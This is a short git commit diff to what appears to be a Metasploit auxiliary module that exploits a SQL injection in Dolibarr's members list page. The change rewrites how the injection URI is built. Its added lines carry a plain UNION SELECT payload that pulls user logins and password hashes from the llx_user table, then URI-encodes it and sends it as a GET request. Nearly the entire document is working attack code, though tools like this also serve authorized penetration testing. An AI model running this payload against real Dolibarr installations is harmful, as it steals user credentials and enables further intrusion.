using uri_encode

2018-08-31 08:41:25 -05:00 · 2018-08-31 08:41:25 -05:00 · aa9d0d7c6c
parent b1151b9d12
commit aa9d0d7c6c
1 changed files with 6 additions and 2 deletions
--- a/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
+++ b/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
@ -72,8 +72,12 @@ class MetasploitModule < Msf::Auxiliary
  end

  def get_info(cookies)
-    # union select 0,1,login,pass_crypted,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from llx_user #
-    inject_uri = target_uri.path << "/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%6c%6f%67%69%6e%2c%70%61%73%73%5f%63%72%79%70%74%65%64%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%20%66%72%6f%6d%20%6c%6c%78%5f%75%73%65%72%20%23"
+    inject_uri = target_uri.path.end_with?('index.php') ? target_uri.path.gsub('index.php', '') : target_uri.path
+    inject_uri <<= "/adherents/list.php?leftmenu=members&statut="
+    cmd = "1) union select 0,1,login,pass_crypted,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from llx_user #"
+    cmd = Rex::Text.uri_encode(cmd, 'hex-all')
+    inject_uri <<= cmd
+
    inject_res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     => normalize_uri(inject_uri),